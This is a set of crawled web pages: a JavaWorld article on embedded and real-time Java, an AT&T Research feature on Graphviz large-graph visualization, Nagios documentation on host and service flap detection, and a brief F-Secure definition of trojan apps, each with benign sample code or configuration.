As devices communicate not just with human consumers, but with other devices, fundamentally new capabilities emerge. It's not only that your refrigerator will know you have run out of tomatoes, but that it can place an order for more on your behalf. The success of pervasive computing will be that it recedes into the background, working out facts and events and remedies with other connected devices. Only executive-level results will be communicated to human consumers. The triumph of IoT will be in all the things that we no longer have to think about, even as they are seamlessly done for us.
The most mundane examples are the most telling. Leave aside just-in-time agricultural pest treatments, miniaturized bomb-sniffers, improved medical diagnostic technology, or similarly impressive applications of IoT in recent news. Think instead of the humble vending machine -- one that's properly stocked, well maintained, and always silently awaiting your command.
When you place your bills in a vending machine and push buttons to indicate your purchase, several mechanisms interact to ensure the satisfaction of your hunger. You don't have to understand or agree with all the details of implementation; your stomach is just happy with the results. Now, we have IoT-enabled vending machines. When you make a purchase from an IoT-enabled vending machine, your purchase triggers actions spanning the globe to keep inventory in balance and parts well-maintained, at a total cost 30 percent lower than the pre-IoT model.
Java for embedded computing
Few people today realize that Java began as a language for embedded computing. Its earliest versions specifically targeted home appliances such as television set-top interfaces. Communication between devices was central to James Gosling's original vision for Java, and he envisioned it being used for not only device-to-consumer but device-to-device communication. Twenty years later, those original design strengths are ready to support the Internet of Things.
Java's ubiquity also makes it a good fit for IoT. Massive resources worldwide are invested in transmitting Java to a new generation of programmers and ensuring that it is maintained to support all the production systems that rely on it. Hundreds of thousands of successful applications and systems already attest to Java's capabilities.
For developers exploring embedded programming it is important to distinguish the parts of the Java platform. Nothing about how you code or read programs needs to change for embedded programming: good Java programmers can read embedded source code just as easily as they do the source for typical desktop enterprise applications. The libraries, and especially the development (and testing) environments, are specialized for embedded Java programming, however. Just be sure that you have the right toolchain for the embedded environment you target.
Java embedded programming in 2015
Java already had the right stuff to make embedded programming possible in 1996, but it lacked momentum. Today that momentum is gathering fast, and an ecosystem of Java standards and tools for embedded programming is ready to leverage it.
Between 2000 and 2010, it was generally true that Java-based embedded or "micro" computing centered on J2ME (Java 2 Platform, Micro Edition). Now, Java Platform, Micro Edition, or Java ME, is the standard runtime environment for embedded applications. While Java ME and its concepts -- especially profiles and configurations -- remain crucial, mobile Java developers tend to focus more on Android, and HTML5 for user interfaces. Cellular telephone handsets are the most visible embedded computers, and roughly four out of five mobiles sold now are based on Android. (Although Android supports Java ME, the two have different product lifecycles, and it's not entirely clear who will decide what the next generation of application environments for practical embedded devices will be.)
Profiles and configurations are crucial concepts in embedded programming. An embedded profile such as MIDP is a collection of APIs supported on devices of interest. A configuration is a framework specification. While not strictly true, it can be useful to think of profiles as belonging to configurations, including most prominently the CLDC, or Connected Limited Device Configuration. (Also see "Jim Connors' Weblog" to learn more about profiles and configurations applicable to IoT.)
In addition to Java ME's profiles and configurations, a handful of enterprise Java technologies hold potential for embedded development. Java Management Extensions (JMX) is used for distributed resource management and monitoring and could one day complement embedded definitions neatly. Real-time Java also holds an important place in embedded programming for IoT.
Java's real-time model and tools
Embedded applications connected to sensors and effectors in medical, transportation, manufacturing, and other domains often have important real-time requirements. Predictable, correct results from heart pacemakers, engine controllers, pipeline valves, and so on are matters of life and death, not just annoying stack tracebacks.
While James Gosling intended Java to fulfill common real-time requirements, real-time computations weren't a strength of Java in its early years. In particular, many Java runtimes had a reputation for unreliability, or at least inconsistency in how they handled garbage collection. Real-Time Specification for Java (RTSJ) and related standards addressed temporal indeterminacy with support for periodic and sporadic task scheduling, task deadlines and CPU time budgets, garbage-collecting threads, and allowances that enable certain tasks to avoid garbage collection delays. RTSJ was approved in 2002 and has been implemented for a number of Java VMs.
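To give a feel for the model, here is a minimal sketch of a periodic task against the javax.realtime API; constructor details vary slightly across RTSJ versions, so the specifics are illustrative:

    import javax.realtime.PeriodicParameters;
    import javax.realtime.RealtimeThread;
    import javax.realtime.RelativeTime;

    public class SensorPoller {
        public static void main(String[] args) {
            // release the task every 10 milliseconds
            PeriodicParameters release =
                new PeriodicParameters(new RelativeTime(10, 0));
            RealtimeThread poller = new RealtimeThread(null, release) {
                public void run() {
                    // waitForNextPeriod() blocks until the next release,
                    // giving predictable periodic scheduling
                    while (waitForNextPeriod()) {
                        // sample the sensor here
                    }
                }
            };
            poller.start();
        }
    }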
Although RTSJ was officially listed as dormant in the Java Community Process until February 2015, specification experts have been actively at work refining and updating it throughout the last decade. As an example, JamaicaVM is an RTSJ implementation supported by aicas GmbH, available at no charge for educational and other non-commercial use.
More recently, Oracle has promoted Java SE for real-time systems, suggesting that Java SE has been enhanced sufficiently to meet soft real-time requirements. Soft here has two related meanings. One is that requirements have to do with average behavior; for instance, it's good enough that an average bank transaction will post within 300 milliseconds. The other is that an occasional missed deadline degrades service quality rather than causing outright failure. This is in contrast to hard real-time requirements, such as the requirement that a particular locomotive-switching solenoid close at worst within one-and-a-quarter seconds of the application receiving a specific alarm. The most important requirement for hard real-time systems, in this sense, is that the worst case must be predictable.
Soft real-time is good enough for many embedded and IoT applications. For applications that require hard real-time support, Java developers largely turn to JSR-302: Safety Critical Java Technology. This spec is a subset of the Real-Time Specification for Java, and parts of it depend on the CLDC. Among other features, Safety-Critical Java defines its own concurrency model and real-time threads. The Open Group industry consortium originally began work on Safety-Critical Java in 2003. Asked about the spec's status, JSR-302 specification lead Doug Locke estimated that its long gestation will lead to an approved specification this spring, with a reference implementation possible by early May 2015.
Next up in Java embedded
Java holds much promise for embedded programming, and there is work to be done in order to enable it to meet the coming explosion of demand and possibility in IoT. Tens of billions of Java-capable devices will go into use as part of the IoT network over the next few years. My next article on this topic will feature specific examples of programming for embedded Java environments in both hobbyist and commercial contexts, along with a deeper explanation of why RTSJ 2.0 will impact Java far beyond traditional domains for real-time programming.
This story, "Java: The once and future king of Internet programming" was originally published by JavaWorld. | <urn:uuid:5baad3c5-ea81-4e6d-bf82-221de80d5269> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2901696/software/java-the-once-and-future-king-of-internet-programming.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00246-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.932545 | 2,046 | 2.90625 | 3 |
Getting and Understanding the Bigger Picture
Simple, elegant, direct . . . graph visualizations can be informative, too. Without knowing anything about the underlying data and without even trying, you see relationships and patterns. The nodes and links could be Facebook connections, router-to-router links in a network, a transportation distribution hub, the path of a call through a call center, or the connections between objects in a compiled grammar. All are networks—a set of entities and the connections between them—and all can be analyzed through graph visualizations.
There is information in the connections. A glance is enough to identify nodes with the most links, nodes straddling different subgroups, and nodes isolated by their lack of connections. Corporations might look at a graph to verify that marketing and sales are communicating, urban planners to monitor the interconnectedness, or isolation, of neighborhoods, biologists to discover interactions between genes, and network analysts to monitor security.
Graph creation made easy
Graph visualizations are everywhere. They need to be. Without them, there would simply be no way to make sense of the vast amounts of data collected.
Fortunately, graphs are easy to make thanks to automatic graph-drawing programs that take information describing a node and the node’s connections and automatically lay out a topology, handling the low-level details of how to arrange nodes so they don’t overlap and obscure one another. Feed in the data and get a picture.
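As a small concrete example, the description fed in is typically a few lines of Graphviz's own DOT language (the node names below are invented):

```
/* friends.dot: a tiny network described in Graphviz's DOT language.
   Only nodes and links are declared; the layout is computed for you. */
graph friends {
    alice -- bob;
    alice -- carol;
    bob   -- carol;
    dave  -- carol;
    erin;            /* an isolated node with no connections */
}
```

Rendering it to an image is then a single command, such as dot -Tpng friends.dot -o friends.png (or neato for a force-directed layout).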
A multitude of graph drawing programs is available, many offering add-ons such as editors to manually change the node layout and adjust colors, shapes, and backgrounds to achieve visually appealing graphs.
Aesthetics is important not so much for looks—though some visualizations can be stunning to look at—but for readability. Links that intersect and nodes that overlay one another result in poor readability, and graph visualization programs work hard to minimize the number of link intersections and give enough whitespace around each node to make it stand out from its neighbors.
One method to ensure a good distribution of nodes, force-directed layout, endows each node with a repelling force to push away neighboring nodes that are too close while spring-like attachments on links work to keep connected nodes clustered together.
The nodes themselves find their own optimal position in turn. First one node employs its repelling force, moving too-close nodes further away. Then it’s the turn of the next node, and then another until each has had a chance to position itself. But the sequence needs to be repeated since later nodes may intrude into the space of a previous node; many iterations may be needed until a state of equilibrium is reached.
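A toy version of the scheme, in sketch form; this is an illustration of the idea only, not Graphviz's implementation, and the force constants are arbitrary:

```java
// Toy force-directed layout step: pairwise repulsion between all nodes
// plus spring attraction along links, then a small move for every node.
// Real implementations add cooling schedules, bounds, and termination tests.
import java.util.List;

class Node { double x, y, dx, dy; }

class Edge {
    final Node a, b;
    Edge(Node a, Node b) { this.a = a; this.b = b; }
}

class ForceLayout {
    static final double REPULSION = 1000.0, SPRING = 0.05, STEP = 0.1;

    static void iterate(List<Node> nodes, List<Edge> edges) {
        for (Node u : nodes) { u.dx = 0; u.dy = 0; }
        for (Node u : nodes)                     // O(n^2) repulsion term
            for (Node v : nodes) {
                if (u == v) continue;
                double ex = u.x - v.x, ey = u.y - v.y;
                double d2 = ex * ex + ey * ey + 0.01;  // avoid divide by zero
                u.dx += REPULSION * ex / d2;
                u.dy += REPULSION * ey / d2;
            }
        for (Edge e : edges) {                   // springs pull linked nodes
            double ex = e.a.x - e.b.x, ey = e.a.y - e.b.y;
            e.a.dx -= SPRING * ex; e.a.dy -= SPRING * ey;
            e.b.dx += SPRING * ex; e.b.dy += SPRING * ey;
        }
        for (Node u : nodes) { u.x += STEP * u.dx; u.y += STEP * u.dy; }
    }
}
```

Callers repeat iterate() until node displacements fall below a tolerance, which is the state of equilibrium described above.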
Force-directed layouts are computationally heavy but work well for graphs of 100-200 nodes; at larger scales (100,000 nodes and more), however, the scheme breaks down under the weight of all the calculations. As the number of nodes increases, the number of calculations increases quadratically: for n nodes, the number of pairwise calculations per iteration is on the order of n^2, so a million-node graph implies on the order of 10^12 calculations per pass. What works for small graphs won't work for large ones.
At a company like AT&T, which operates some of the world’s largest networks, the problem of scale is a perennial issue. AT&T must often develop custom solutions to address the scale issue. This is one reason it maintains a sophisticated and wide-ranging research effort.
For the visualizations needed for its large data collections, AT&T adapted its own network visualization program, Graphviz, which had originally been developed for graphing software objects. (Because all networks have a similar mathematical definition, there is little difference between rendering software objects and router-to-router links in communications networks, apart from the scale factor.) For the program to handle layouts with millions of nodes entailed key advancements in network visualization, including the introduction of advanced geometric and numerical optimization algorithms. Entirely new approaches, including stress majorization and multilevel optimization, were also required.
Additional algorithmic enhancements were needed to ensure a readable, useful visualization, and Graphviz pioneered techniques in linear programming for aesthetic node placement, drawing curved edge splines around obstacles through numerical optimization, and robust overlap removal methods to preserve the overall structure of layouts while also making it possible to read labels even in tightly packed diagrams.
AT&T has made Graphviz available as open source software, and many other programs incorporate Graphviz as a visualization service for applications as diverse as databases and data analysis, bioinformatics, software engineering, programming languages and tools, and machine learning.
So how does Graphviz handle large datasets?
The first step is to reduce the size of the graph. This takes several passes, since each pass halves the number of nodes: one million nodes becomes 500,000, which then becomes 250,000, and so on, all the way down to a manageable 50 or fewer nodes. At that point it is a small graph, and force-directed techniques can be employed.
Of course, the way in which the nodes are reduced has to be done carefully and above all uniformly to preserve the original overall structure. This is not easy, and certain substructures, such as star graphs with an inordinate number of connections, must be identified and handled as special cases.
Various filtering and aggregating techniques are used to identify nodes that can be deleted without destroying the overall structure. One method is graph coarsening, which identifies perfectly matched node-links arrangements that can be collapsed without altering the overall topology.
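In sketch form, one coarsening pass might look like the following; this is a toy illustration of greedy neighbor matching, not Graphviz's production algorithm:

```java
// Toy coarsening pass: greedily match each unmatched node with one
// unmatched neighbor and collapse the pair into a single coarse node,
// roughly halving the node count while preserving overall connectivity.
import java.util.HashMap;
import java.util.Map;
import java.util.Set;

class Coarsen {
    // adj maps each node id to the set of its neighbors' ids.
    static Map<Integer, Integer> matchPass(Map<Integer, Set<Integer>> adj) {
        Map<Integer, Integer> coarseOf = new HashMap<>();
        int next = 0;
        for (Integer u : adj.keySet()) {
            if (coarseOf.containsKey(u)) continue;   // already matched
            Integer mate = null;
            for (Integer v : adj.get(u))
                if (!coarseOf.containsKey(v)) { mate = v; break; }
            coarseOf.put(u, next);                      // collapse u and its
            if (mate != null) coarseOf.put(mate, next); // mate together
            next++;
        }
        return coarseOf;   // node id -> id of its coarse-graph node
    }
}
```

Repeating such a pass, and interpolating positions back as the graph is rebuilt, is the essence of the multilevel approach.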
Once a good layout is found through a force-directed algorithm, the graph is then built up again to its original size. For a graph the size of 1 million nodes, the entire process takes around 15 minutes; considering the number of calculations carried out and the range of operations, this is exceedingly fast. This time can be reduced significantly if a slight reduction in layout quality is allowed.
Large graphs and their information
Laying out large graphs is a hard problem, but viewing them is also hard. Large graphs won't display within the confines of a computer screen. Viewing a small part of the whole at a time is a solution, but not when it's important to see how changes in one part of the graph affect other parts. In communications networks such as those maintained by AT&T, investigating how various elements within the network interact and affect other parts is sometimes the whole point.
Graphviz's answer is an interactive graph viewer, Smyrna, designed to handle large graphs. In addition to panning and zooming, Smyrna provides a topological fisheye view that magnifies an area of interest while keeping the entire graph in view to maintain the needed context. This is done by collapsing nodes outside the focal area in a way that preserves the overall structure, with more distortion occurring in the nodes farthest from the focal area. The calculations for collapsing nodes are done in real time to ensure smooth transitions as the viewer navigates through the scene.
With Smyrna, the viewer can also navigate through three dimensions, which gives additional space to examine a graph's structure. Occlusions are more of a problem with 3D displays, though it's easy to manipulate the graph to see behind nodes. This ability to directly manipulate the graph structure, to turn it and move individual nodes, involves the viewer with the graph in a way not possible with 2D graphs.
If you can move an individual node, the next natural step is to click a node for information (node information is very rich in Graphviz), which Smyrna supports. Clicking a node can access underlying data if the visualization associates an action with each node, such as opening a web page where the information can be found.
But more useful for accessing information and analyzing the data is the ability in Smyrna to write queries and filter graphs based on attribute information and graph structure. Queries could locate all nodes sharing similar attributes, such as all people with the same last name or birthday, or locate all ISPs that recently handled a certain IP address.
Filtering a graph reduces a large graph to just the part that is relevant to the particular query.
Until now, node-link layouts have emphasized representing relationships and have too often been the end of a process (feed in the data, see what it looks like, go back to the data). The ability to directly access data, write queries, and closely investigate individual nodes shows how visualizations can become part of the analysis process itself, answering questions such as "Why do some nodes cluster together?" and "Which nodes in the entire graph share the same attributes?"
The distinction between visualization and interface is blurring, and the line between visualization and analysis is being crossed.
For visualizations to truly be part of the analysis, there remain some hard problems to solve. One, networks change constantly, and understanding where these changes occur is an important part of network analysis. But finding changes in large graphs is difficult, for two fundamental reasons.
One, the sheer size of a visualization containing millions of nodes makes it hard to see changes, especially those happening in obscure areas that are not often investigated.
Second, the way in which large graphs are generated, where the initial node placement may be random, can cause a large graph to look different every time it's generated, even when the data changes are small and limited to a few nodes. People build a mental map of what a graph looks like, based on how they first see it, and look for changes by comparing the new layout with that mental map. Minor tweaking to add or delete a few nodes causes many other nodes to self-adjust, so the visualization may look much different from the mental map even though the changes are small. New or better algorithms are needed to preserve a node layout so small changes don't result in big changes, and to do so in very fast computing time.
Other problems include handling small-world graphs, in which a high number of nodes are closely related, a common feature of social and communications networks. The resulting tight proximity and the number of shared links make layout particularly difficult. One solution being explored is to represent small-world subgraphs as a single, large node that expands when clicked.
There is no lack of incentive to find solutions to these and other problems of large graphs. Visualizations may be the only way to tackle the analysis of extra-large datasets, which will only become more numerous and bigger as data collection techniques multiply. Solutions will be found, and the only questions are what those solutions will be, and how soon.
Getting the Big Picture
Undirected layouts are used when there is no inherent ordering of the nodes. Graphs arising from communication and online social networks are undirected.
Circular layouts depict connections of nodes closely related to one another, such as those on a LAN.
Radial layouts depict networks focused on some central node, as arises in some social networks.
Matrices can be visualized using the same node-link graphs. Yifan Hu of AT&T Labs graphed over 2,000 sparse data sets using Graphviz.
Reducing the number of edge crossings is key to graph readability, and most graph layout algorithms consider the task of arranging nodes to reduce crossings.
But there are other ways of approaching the readability problem.
What if you start with a different premise, such as reducing the amount of ink? Reducing the number and length of links would reduce the amount of ink.
In this exercise, the nodes were sorted around the circle so as to reduce the length of edges. This produced layouts with fewer crossings than when heuristics are used to explicitly reduce crossings. And following an idea based on the work of Danny Holten (Eindhoven University of Technology), lines that traverse the interior share the same path when possible, reducing the perceived number of intersections as well.
The resulting increase in white space reduces the clutter.
But can the graph be made clearer still?
The solution. Forget about saving ink, and try something new.
Rerouting links around the outside of the circle dramatically reduces link crossings.
It uses more ink of course, but in graphs, clarity is all. | <urn:uuid:1b12fa16-0b53-4e00-8497-0b870262410d> | CC-MAIN-2017-04 | http://www.research.att.com/articles/featured_stories/2009/200910_more_than_just_a_picture.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00274-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940921 | 2,573 | 3.0625 | 3 |
Up To: Contents
See Also: State Types
Nagios supports optional detection of hosts and services that are "flapping". Flapping occurs when a service or host changes state too frequently, resulting in a storm of problem and recovery notifications. Flapping can be indicative of configuration problems (i.e. thresholds set too low), troublesome services, or real network problems.
How Flap Detection Works
Before I get into this, let me say that flapping detection has been a little difficult to implement. How exactly does one determine what "too frequently" means in regards to state changes for a particular host or service? When I first started thinking about implementing flap detection I tried to find some information on how flapping could/should be detected. I couldn't find any information about what others were using (were they using any?), so I decided to settle on what seemed to me to be a reasonable solution...
Whenever Nagios checks the status of a host or service, it will check to see if it has started or stopped flapping. It does this by:
Storing the results of the last 21 checks of the host or service
Analyzing the historical check results and determining where state changes/transitions occur
Using the state changes to determine a percent state change value for the host or service
Comparing the percent state change value against low and high flapping thresholds
A host or service is determined to have started flapping when its percent state change first exceeds a high flapping threshold.
A host or service is determined to have stopped flapping when its percent state goes below a low flapping threshold (assuming that it was previously flapping).
Let's describe in more detail how flap detection works with services...
The image below shows a chronological history of service states from the most recent 21 service checks. OK states are shown in green, WARNING states in yellow, CRITICAL states in red, and UNKNOWN states in orange.
The historical service check results are examined to determine where state changes/transitions occur. State changes occur when an archived state is different from the archived state that immediately precedes it chronologically. Since we keep the results of the last 21 service checks in the array, there is a possibility of having at most 20 state changes. In this example there are 7 state changes, indicated by blue arrows in the image above.
The flap detection logic uses the state changes to determine an overall percent state change for the service. This is a measure of volatility/change for the service. Services that never change state will have a 0% state change value, while services that change state each time they're checked will have 100% state change. Most services will have a percent state change somewhere in between.
When calculating the percent state change for the service, the flap detection algorithm will give more weight to new state changes compared to older ones. Specifically, the flap detection routines are currently designed to make the newest possible state change carry 50% more weight than the oldest possible state change. The image below shows how recent state changes are given more weight than older state changes when calculating the overall or total percent state change for a particular service.
Using the images above, lets do a calculation of percent state change for the service. You will notice that there are a total of 7 state changes (at t3, t4, t5, t9, t12, t16, and t19). Without any weighting of the state changes over time, this would give us a total state change of 35%:
(7 observed state changes / possible 20 state changes) * 100 = 35 %
Since the flap detection logic will give newer state changes a higher weight than older state changes, the actual calculated percent state change will be slightly less than 35% in this example. Let's say that the weighted percent state change turned out to be 31%...
The calculated percent state change for the service (31%) will then be compared against the flapping thresholds to see what should happen:
If the service was not previously flapping and its percent state change is greater than or equal to the high flap threshold, Nagios considers the service to have just started flapping.
If the service was previously flapping and its percent state change is less than the low flap threshold, Nagios considers the service to have just stopped flapping.
If neither of those two conditions is met, the flap detection logic won't do anything else with the service, since it is either not currently flapping or it is still flapping.
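In code, the weighting and threshold logic reduces to something like the sketch below. It is an illustration rather than Nagios's actual source; the linear 0.8-to-1.2 weight ramp is chosen so the newest change counts exactly 50% more than the oldest, matching the description above, and the threshold values are illustrative:

```java
// Sketch of weighted percent state change over the last 21 check results.
// states[0] is the oldest result and states[20] the newest; weights ramp
// linearly from 0.8 (oldest possible change) to 1.2 (newest), so the
// newest change carries 1.2 / 0.8 = 1.5x the weight of the oldest.
class FlapDetection {
    static final double LOW_THRESHOLD = 5.0;    // illustrative values
    static final double HIGH_THRESHOLD = 20.0;

    static double percentStateChange(int[] states) {
        int possible = states.length - 1;        // 21 results, 20 changes
        double weighted = 0.0;
        for (int i = 1; i < states.length; i++)
            if (states[i] != states[i - 1])
                weighted += 0.8 + 0.4 * (i - 1) / (possible - 1.0);
        return weighted / possible * 100.0;      // all-change case = 100%
    }

    static boolean update(boolean wasFlapping, double pct) {
        if (!wasFlapping && pct >= HIGH_THRESHOLD) return true;  // starts
        if (wasFlapping && pct < LOW_THRESHOLD) return false;    // stops
        return wasFlapping;                      // otherwise unchanged
    }
}
```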
Flap Detection for Services
Nagios checks to see if a service is flapping whenever the service is checked (either actively or passively).
The flap detection logic for services works as described in the example above.
Flap Detection for Hosts
Host flap detection works in a similar manner to service flap detection, with one important difference: Nagios will attempt to check to see if a host is flapping whenever the host itself is checked (actively or passively) and whenever a service associated with that host is checked.
Why is this done? With services we know that the minimum amount of time between consecutive flap detection routines is going to be equal to the service check interval. However, you might not be monitoring hosts on a regular basis, so there might not be a host check interval that can be used in the flap detection logic. Also, it makes sense that checking a service should count towards the detection of host flapping. Services are attributes of, or things associated with, a host after all... At any rate, that's the best method I could come up with for determining how often flap detection could be performed on a host, so there you have it.
Flap Detection Thresholds
Nagios uses several variables to determine the percent state change thresholds it uses for flap detection. For both hosts and services, there are global high and low thresholds and host- or service-specific thresholds that you can configure. Nagios will use the global thresholds for flap detection if you do not specify host- or service-specific thresholds.
The table below shows the global and host- or service-specific variables that control the various thresholds used in flap detection.
|Object Type||Global Variables||Object-Specific Variables|
|Hosts||low_host_flap_threshold, high_host_flap_threshold||low_flap_threshold, high_flap_threshold|
|Services||low_service_flap_threshold, high_service_flap_threshold||low_flap_threshold, high_flap_threshold|
States Used For Flap Detection
Normally Nagios will track the results of the last 21 checks of a host or service, regardless of the check result (host/service state), for use in the flap detection logic.
Tip: You can exclude certain host or service states from use in flap detection logic by using the flap_detection_options directive in your host or service definitions. This directive allows you to specify what host or service states (i.e. "UP", "DOWN", "OK", "CRITICAL") you want to use for flap detection. If you don't use this directive, all host or service states are used in flap detection.
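For instance, a service definition that enables flap detection, restricts it to OK and CRITICAL states, and overrides the global thresholds might look like this (the host, command, and threshold values are illustrative, and other required directives are omitted):

```
define service {
    host_name               web01
    service_description     HTTP
    check_command           check_http
    flap_detection_enabled  1       ; use flap detection for this service
    flap_detection_options  o,c     ; count only OK and CRITICAL states
    low_flap_threshold      5.0     ; stop-flapping threshold (percent)
    high_flap_threshold     20.0    ; start-flapping threshold (percent)
    }
```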
When a service or host is first detected as flapping, Nagios will: log a message stating that the service or host is flapping, add a non-persistent comment to the service or host indicating that it is flapping, send a "flapping start" notification to appropriate contacts, and suppress other notifications for the service or host while it remains flapping.
When a service or host stops flapping, Nagios will: log a message stating that the service or host has stopped flapping, delete the comment that was added when it started flapping, send a "flapping stop" notification to appropriate contacts, and remove the block on other notifications for the service or host.
Enabling Flap Detection
In order to enable the flap detection features in Nagios, you'll need to set the enable_flap_detection directive in the main configuration file to 1 and set the flap_detection_enabled directive in your host and service definitions to 1.
If you want to disable flap detection on a global basis, set the enable_flap_detection directive to 0.
If you would like to disable flap detection for just a few hosts or services, use the flap_detection_enabled directive in the host and/or service definitions to do so. | <urn:uuid:3ed97c12-69bb-4189-bba8-88cdf6397a5f> | CC-MAIN-2017-04 | https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/3/en/flapping.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00182-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.917473 | 1,377 | 2.578125 | 3 |
Walking in Trees
A research team observing wild orangutans in Sumatra, Indonesia, found that walking on two legs may have originated in ancient, tree-dwelling apes, rather than in more recent human ancestors who lived on land, as current theory suggests.
Walking upright, or bipedalism, has long been considered a defining feature of humans and our closest ancestors. One of the most popular explanations, the "savannah hypothesis," suggests that chimps, gorillas and human ancestors descended from tree-swinging primates and began walking on the ground on all fours.
Over time, this four-legged gait would have evolved into the "knuckle-walking" that chimps and gorillas still use today, and then into upright, two-legged walking in humans.
Paleontologists have conventionally used signs of bipedalism as key criteria for distinguishing early human fossils from those of apes. But this distinction is complicated by recent fossil evidence that some early humans, including Lucy, lived in woodland environments, while even earlier forms, such as Millennium Man, might have lived in the forest canopy and moved on two legs.
To collect the data, Susannah Thorpe of the University of Birmingham, UK, spent a year living in the Sumatran rainforest, recording virtually every move the orangutans made. She and her colleagues then used these observations to test the hypothesis that bipedalism would have benefited our tree-dwelling ape ancestors.
- American Association for the Advancement of Science | <urn:uuid:ae8b3945-8b60-4ccc-8e62-8f206da2dc12> | CC-MAIN-2017-04 | http://www.govtech.com/magazines/gt/Walking-in-Trees.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280587.1/warc/CC-MAIN-20170116095120-00026-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.948067 | 318 | 4.0625 | 4 |
New genetic study could define a healthy human.
Google has embarked on Baseline Study – a quest inside the human body, as part of its mission to define the ideal ‘healthy human’.
In what is said to be the tech firm’s most ambitious and difficult science project ever, Google X’s latest Moonshot Project involves the collection of a mass of genetic and molecular information to develop a picture of what makes up the perfect healthy human.
Google X’s Dr. Andrew Conrad told the Wall Street Journal: "With any complex system, the notion has always been there to proactively address problems.
"That’s not revolutionary. We are just asking the question: If we really wanted to be proactive, what would we need to know? You need to know what the fixed, well-running thing should look like."
Rather than targeting specific diseases, the project will gather different samples via a range of new diagnostic tools, and then Google will apply its computing power to uncover patterns, or 'biomarkers', in the information.
Medical researchers can use the discovered biomarkers to detect disease much earlier.
Google noted that the information obtained from Baseline Study will be secret, with its use being limited only to medical and health purposes, and not to be shared with insurance firms.
Institutional review boards will monitor the Baseline project, supervising all medical research involving humans; once the study expands, boards operated by the medical schools at Duke University and Stanford University will keep an eye on how the data is used.
Stanford University’s medical school Department of Radiology chair, Sam Gambhir, said: "That’s certainly an issue that’s been discussed.
"Google will not be allowed free rein to do whatever it wants with this data."
As part of the Baseline Study, the team will initially collect its information from 175 volunteers, with several thousands more anticipated to join the project over time.
Furthermore, Google and other researchers will be able to access data including participants' entire genomes; parents' genetic records; information on how they metabolise food, nutrients and drugs; their heart rate under stress; and the impact of chemical reactions on their genes. | <urn:uuid:29df80e4-a9d6-4469-a4bf-afa5a3504521> | CC-MAIN-2017-04 | http://www.cbronline.com/news/google-searches-deeper-into-human-body-250714-4327463 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00466-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.925922 | 469 | 3.515625 | 4 |
Over the last few months, the topic of encryption has become a common debate amongst the technology industry and government agencies.
Recently, the major tech giant Apple was approached by the U.S. Department of Justice to unlock an iPhone 5C used in connection to the San Bernardino shooting. After resisting a court order demanding the iPhone be unlocked, Apple explained that doing so would create a backdoor that could be exploited in other iPhones.
In response, other tech giants like Facebook and Google have claimed they are working to make consumer data as secure as possible, even from the eyes of the government. While Facebook already utilizes encryption with its WhatsApp messaging service, they’re looking to apply the same style of encryption to the services’ voice calls and group messages. Google is currently researching whether it’s possible for them to apply the encryption method used for emails to other products.
The battle between Silicon Valley and the U.S. government has been going on since long before the Apple and DoJ debate. While the tech industry places a higher priority on securing its consumers' private data, the government feels this encryption obstructs its ability to access information vital to criminal and terrorist investigations. Fortunately, the federal government understands that weakening encryption or allowing backdoors would allow enemies to hack into U.S. products and networks.
One idea proposed by tech industry experts states companies could be asked to hand over metadata for criminal investigations while still keeping the content of the message encrypted, allowing government officials access to the names of individuals messaging as well as where and when they communicated.
While the topic of encryption may not be a light one, there's one thing most people can agree on: keeping sensitive data out of our enemies' hands is a top priority. From an enterprise standpoint, hackers are becoming more and more sophisticated in their means of attack, and institutions should remain vigilant and alert when it comes to securing sensitive personally identifiable information. Making sure your system is hardened and vulnerability-free, coupled with continuous file integrity monitoring, breach detection and host intrusion detection, will help protect your IT estate against a malicious attack. | <urn:uuid:d4689df5-3f6f-4047-a063-8bb85b1b27dd> | CC-MAIN-2017-04 | https://www.newnettechnologies.com/tech-giants-like-fb-google-beefing-up-data-security-methods-amid-encryption-debate.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00311-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.942589 | 425 | 2.5625 | 3 |
Carnegie Mellon University educators have created an app inspired by social network sites like Twitter and Facebook that is designed to bring students together to improve learning.
The Classroom Salon app has been used by thousands of high school and college students this past year (see video below of some users talking about it) and will be extended to students at the University of Baltimore this year in an effort to see if it can help prevent students from failing introductory courses and eventually dropping out of school.
Classroom Salon is currently available for use by invitation only, but you can see on the site examples of how it works. Social networking mechanisms give users the ability to comment, via online annotations, on assigned texts such as a fellow student's writing. Students can then filter through the comments based on who made them and can be steered by color-coded highlighting to the parts of their writing that generated the most discussion. An example on the site shows an annotated version of President Obama's second State of the Union Address.
"Sites such as Facebook and Twitter have captured the attention of young people in a way that blogs and online discussion forums have not," said Ananda Gunawardena, associate teaching professor in the CMU Computer Science Department, in a statement (He developed CLS with David S. Kaufer, an English professor). "With Classroom Salon, we've tried to capture the sense of connectedness that makes social media sites so appealing, but within a framework that that allows groups to explore texts deeply. So it's not just social networking for the sake of socializing but enhancing the student experience as readers and writers."
A $250K grant from the Next Generation Learning Challenges program backed by the Bill & Melinda Gates Foundation and the William and Flora Hewlett Foundation will support using the app at the University of Baltimore. It will be used in conjunction with free learning resources from CMU's Open Learning Initiative. | <urn:uuid:aa52a55c-b0f6-4d49-b7b1-57db4ecd0b7e> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2229158/smb/can-social-networking-save-students-from-failing-in-school-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00431-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.951664 | 392 | 2.796875 | 3 |
A seemingly legitimate application (app) that secretly performs other, usually malicious, functions detrimental to the user's personal information and/or the user's control of the device on which the app is installed.
F-Secure SAFE automatically blocks installation of this program.
